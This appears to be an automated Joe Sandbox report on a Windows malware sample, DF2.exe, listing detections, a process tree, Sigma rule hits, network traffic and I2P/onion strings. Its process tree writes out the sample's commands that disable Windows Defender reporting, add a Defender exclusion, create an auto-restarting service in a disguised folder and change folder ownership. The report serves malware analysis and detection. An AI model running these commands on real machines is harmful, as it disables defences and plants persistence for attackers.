Edit tour

Windows Analysis Report
DF2.exe

Overview

General Information

Sample name:	DF2.exe
Analysis ID:	1583067
MD5:	9b41d60958d07cdfd3cbc58fbb56cea7
SHA1:	da86bea1b0de55fed13464a374e2f724ce38aee7
SHA256:	7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
Tags:	exeuser-aachum
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Found Tor onion address

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies Windows Defender protection settings

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

DF2.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\DF2.exe" MD5: 9B41D60958D07CDFD3CBC58FBB56CEA7)

DF2.exe (PID: 6696 cmdline: C:\Users\user\Desktop\DF2.exe MD5: 9B41D60958D07CDFD3CBC58FBB56CEA7)

cmd.exe (PID: 6840 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7032 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1740 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7012 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

w8m7wmyk939oczmkw4o2h16hs.exe (PID: 3068 cmdline: "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)

nju2apmx83wqd9u7namsf59y.exe (PID: 7028 cmdline: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)

taskkill.exe (PID: 3220 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5756 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6652 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7116 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7136 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 5324 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 1508 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

main.exe (PID: 7100 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)

WerFault.exe (PID: 6844 cmdline: C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 6308 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5252 cmdline: C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

main.exe (PID: 6764 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5252, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7100, ProcessName: main.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7032, ProcessName: powershell.exe

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe, ParentProcessId: 7028, ParentProcessName: nju2apmx83wqd9u7namsf59y.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6652, ProcessName: sc.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 68.183.196.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe, ParentProcessId: 7028, ParentProcessName: nju2apmx83wqd9u7namsf59y.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6652, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7032, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6308, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://netdb.i2p2.no/	Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/r	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/9	Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/	Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org:443/i2pseeds.su3	Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su3	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Avira: detection malicious, Label: TR/AVI.Agent.jibab

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	ReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	ReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	ReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	ReversingLabs: Detection: 57%
Source: C:\Windows\Temp\6KasAPG0	ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\DiEI7oU1	ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\yGODxgsj	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source:	Binary string: RfxVmt.pdb source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source:	Binary string: RfxVmt.pdbGCTL source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E16387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	21_2_00007FFE0E16387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	21_2_00007FFE0E1638C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE117738C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	32_2_00007FFE117738C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1177387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	32_2_00007FFE1177387F

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CC3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF764CC3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FF76A901CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FF76A901CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE11504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11EC5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE11EC5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11776233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11776233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11BDB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11BDB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11EC4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11EC4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE126D5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE126D5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE132057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE132057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE133031F3

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	21_2_00007FF76A90737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	21_2_00007FFE0E16A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	21_2_00007FFE0EB47DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	21_2_00007FFE1150967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	21_2_00007FFE11ECA67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE1177A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE11BD7DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE11EC967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE126DA67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE1320293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 4x nop then lea r9, qword ptr [r8-01h]	32_2_00007FFE13309BBB

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 5.181.20.93 ports 2,3,6,26893,8,9
Source: global traffic	TCP traffic: 78.58.99.133 ports 1,2,4,6,29641,9
Source: global traffic	TCP traffic: 95.164.4.146 ports 21309,0,1,2,3,9
Source: global traffic	TCP traffic: 88.228.207.122 ports 16453,1,3,4,5,6
Source: global traffic	TCP traffic: 89.35.131.34 ports 0,1,31750,3,5,7
Source: global traffic	TCP traffic: 81.168.83.201 ports 18290,0,1,2,8,9
Source: global traffic	TCP traffic: 173.68.123.78 ports 0,2,3,4,5,25043
Source: global traffic	TCP traffic: 212.116.61.165 ports 24605,0,2,4,5,6
Source: global traffic	TCP traffic: 38.40.94.251 ports 28976,2,6,7,8,9
Source: global traffic	TCP traffic: 81.136.49.129 ports 0,2,3,6,8,28063
Source: global traffic	TCP traffic: 68.149.143.121 ports 0,1,6,7,8,10687

Found Tor onion address

Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/6
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/b
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/s
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000015.00000002.2484200859.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
